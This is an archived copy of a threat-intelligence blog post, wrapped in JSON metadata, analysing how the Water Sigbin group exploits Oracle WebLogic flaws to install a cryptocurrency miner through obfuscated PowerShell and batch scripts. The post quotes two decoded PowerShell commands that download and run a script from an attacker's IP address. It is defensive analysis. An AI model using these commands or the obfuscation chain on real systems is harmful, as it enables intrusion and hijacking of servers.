{
	"id": "76902281-2cc0-4625-8110-fc707e1b6bba",
	"created_at": "2026-04-06T00:11:06.522892Z",
	"updated_at": "2026-04-10T03:28:21.016375Z",
	"deleted_at": null,
	"sha1_hash": "a98e9cc9cca17aef9d6ae4568f8e91e30a42964b",
	"title": "Decoding Water Sigbin's Latest Obfuscation Tricks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1734665,
	"plain_text": "Decoding Water Sigbin's Latest Obfuscation Tricks\r\nBy: Sunil Bharti May 30, 2024 Read time: 5 min (1382 words)\r\nPublished: 2024-05-30 · Archived: 2026-04-02 11:07:21 UTC\r\nAPT \u0026 Targeted Attacks\r\nWater Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\r\nSummary\r\nWater Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script.\r\nThe gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery.\r\nThe PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components.\r\nThe group performed fileless execution by using .NET reflection techniques in PowerShell scripts, which allows the malware code to run solely in memory, avoiding disk-based detection mechanisms.\r\nThe continuous evolution of threat actor tools, tactics, and procedures (TTPs) highlights the need for organizations to remain vigilant and adopt various cybersecurity best practices, like regular patch management, employee training, and incident response plans.\r\nWater Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The group has been known to integrate vulnerability exploitation as part of its wide array of TTPs.\r\nIn our previous discussion on the group's tactics, we looked into how it operates using ever-evolving and complex methods. However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways to outsmart defenders. Recently, we’ve observed Water Sigbin using new techniques and methods to hide its activities, making the group’s attacks more difficult to defend against.\r\nCVE-2017-3506 and CVE-2023-21839 exploitation\r\nWe found the threat actor exploiting two Oracle WebLogic Server vulnerabilities, CVE-2017-3506 (a vulnerability allowing remote OS command execution) and CVE-2023-21839 (an insecure deserialization vulnerability), to deploy a cryptocurrency miner via a PowerShell script named bin.ps1 on the victim host. Upon closer examination of the group’s tools, tactics, and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin, indicating that it is continuously updating its deployment scripts and tools.\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 1 of 7\r\nWe observed the following attack payload for CVE-2017-3506:\r\nFigure 1. The attack payload for CVE-2017-3506\r\nThe base64-encoded string in the attack payload decodes to the following:\r\npowershell \"IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')\"\r\nMeanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.\r\nFigure 2. The attack payload for CVE-2023-21839\r\nFor this exploit, the base64-encoded string in the attack payload decodes to:\r\npowershell \"IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')\"\r\nWe found exploitation attempts on both Linux and Windows machines, with the threat actor deploying shell scripts on the former and a PowerShell script on the latter. For our analysis, we will refer to the techniques used in the Windows version of the exploitation, which shows a noteworthy obfuscation technique used by Water Sigbin.\r\nAt the outset of payload delivery during vulnerability exploitation, the threat actor used the following techniques to evade detection:\r\nImplementation of hexadecimal encoding for URLs:\r\nThe URL used to download and deploy the PowerShell script is depicted in the following image:\r\nFigure 3. Hex encoding of the URL\r\nThe hexadecimal IP address in this URL (0xb9ac8092) translates in dotted-decimal notation to http://185.172.128.146:443/bin[.]ps1\r\nEmploying HTTP over port 443:\r\nAs seen in the previous URL, Water Sigbin uses plain HTTP on port 443 (normally the HTTPS port) for stealthy communication.\r\nThe bin.ps1 PowerShell script consists of two parts:\r\n1. A lengthy base64-encoded string containing the binary code and instructions to execute it\r\n2. A function responsible for decoding the base64 string, writing the decoded contents into a file named microsoft_office365.bat in the temporary directory, and silently executing it\r\nFigure 4. Content of bin.ps1 PowerShell script\r\nThe base64-encoded content decoded by the Convert-Base64ToFileAndExecuteSilently function in the bin.ps1 file reveals the core script elements. This decoded content is then written to the temporary directory under the file name microsoft_office365.bat.\r\nAnalysis of microsoft_office365.bat\r\nThe microsoft_office365.bat script employs environment variables to obfuscate the original script code, making it seem complex and confusing. The script commences with the following code:\r\nFigure 5. Initial code of the script “microsoft_office365.bat”\r\nOn first inspection, the script appears to set environment variables to unreadable, gibberish data. After thorough analysis, however, it became clear that the threat actors had implemented a very effective method of hiding their malicious code.\r\nTo get the actual code, we need to decode the first “if” condition:\r\nFigure 6. If condition in “microsoft_office365.bat”\r\nNext, we need to replace RxEGj with an empty string (“”) in every part of the code. After doing this, the first part of the script will look like the following:\r\nFigure 7. Decoded first part of the script\r\nThe initial command cmd /c \"set __=\u0026rem\" runs a new command prompt, sets the “__” environment variable to an empty string, and then executes the rem (records comments in a batch file) command, which does nothing. Overall, this script section appears to be designed to start a new command prompt window in minimized mode and then exit the current script.\r\nThe next two lengthy lines of base64-encoded content contain the actual binary code, which requires processing before it can be used. The attacker employs PowerShell methods for this processing.\r\nFigure 8. Encoded malicious binary code\r\nThe next section contains obfuscated PowerShell code, which does all the processing on the base64-encoded string for further usage.\r\nFigure 9. Obfuscated PowerShell code\r\nSimilarly, if we deobfuscate the remaining section by replacing RxEGj with an empty string (\"\"), we obtain the actual PowerShell code:\r\nFigure 10. Decoded PowerShell code\r\nThis PowerShell command performs the following actions:\r\n1. Decodes the base64 string ([Convert]::FromBase64String)\r\n2. Decrypts the very long decoded string with AES ([System.Security.Cryptography.Aes])\r\n3. Decompresses the decrypted data ([IO.Compression.CompressionMode])\r\n4. Executes the malware code using .NET in-memory reflection ([System.Reflection.Assembly])\r\nBy leveraging \"System.Reflection.Assembly,\" the attacker orchestrates a fileless execution strategy, ensuring that all operations occur solely in memory.\r\nConclusion\r\nWater Sigbin's activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the adaptability of modern threat actors. The use of sophisticated obfuscation techniques such as hexadecimal encoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and layered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a threat actor that can capably hide its tracks, making detection and prevention more challenging for security teams. These evolving tactics signify a need for constant vigilance and proactive countermeasures to safeguard systems and networks against sophisticated threats.\r\nRecommendations\r\nTo effectively protect systems and networks against vulnerability exploitation such as that carried out by Water Sigbin, organizations can implement a variety of cybersecurity best practices and proactive defense measures. Here are some recommendations:\r\n1. Patch management. Prioritize regular updates and patch management processes to ensure that all systems are running the latest software versions. Quickly apply security patches for known vulnerabilities, especially those with publicly available exploits.\r\n2. Network segmentation. Use network segmentation to reduce the attack surface. By separating critical network segments from the larger network, the impact of a potential vulnerability exploitation can be minimized.\r\n3. Regular security audits. Conduct security audits and vulnerability assessments regularly to identify and remediate potential weaknesses within the infrastructure before they can be exploited.\r\n4. Security awareness training. Educate employees about the common tactics used by attackers so they can recognize and avoid falling victim to social engineering attacks that might precede vulnerability exploitation.\r\n5. Incident response plan. Develop, test, and maintain an incident response plan so your organization can respond quickly and effectively to any security breaches or vulnerability exploitations.\r\n6. Threat intelligence. Subscribe to threat intelligence feeds to stay informed about the latest threats and tactics used by threat actors and advanced persistent threat (APT) groups.\r\nTrend solutions\r\nThe following protections exist to detect malicious activity and shield Trend customers against the exploitation of the vulnerabilities discussed in this blog entry:\r\n1011716 - Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)\r\n1010550 - Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-3506)\r\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found here.\r\nMITRE ATT\u0026CK\r\nTactic / Technique / Technique ID\r\nInitial Access: Exploit Public-Facing Application (T1190)\r\nExecution: Command and Scripting Interpreter: PowerShell (T1059.001)\r\nDefense Evasion: Deobfuscate/Decode Files or Information (T1140)\r\nDefense Evasion: Obfuscated Files or Information: Command Obfuscation (T1027.010)\r\nDefense Evasion: Hide Artifacts: Hidden Window (T1564.003)\r\nDefense Evasion: Process Injection: Portable Executable Injection (T1055.002)\r\nDefense Evasion: Reflective Code Loading (T1620)\r\nCommand and Control: Data Encoding: Standard Encoding (T1132.001)\r\nCommand and Control: Application Layer Protocol: Web Protocols (T1071.001)\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nSource: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html"
	],
	"report_names": [
		"decoding-8220-latest-obfuscation-tricks.html"
	],
	"threat_actors": [
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8",
			"created_at": "2024-07-09T02:00:04.434476Z",
			"updated_at": "2026-04-10T02:00:03.671196Z",
			"deleted_at": null,
			"main_name": "Water Sigbin",
			"aliases": [
				"8220 Gang"
			],
			"source_name": "MISPGALAXY:Water Sigbin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434266,
	"ts_updated_at": 1775791701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.pdf",
		"text": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.txt",
		"img": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.jpg"
	}
}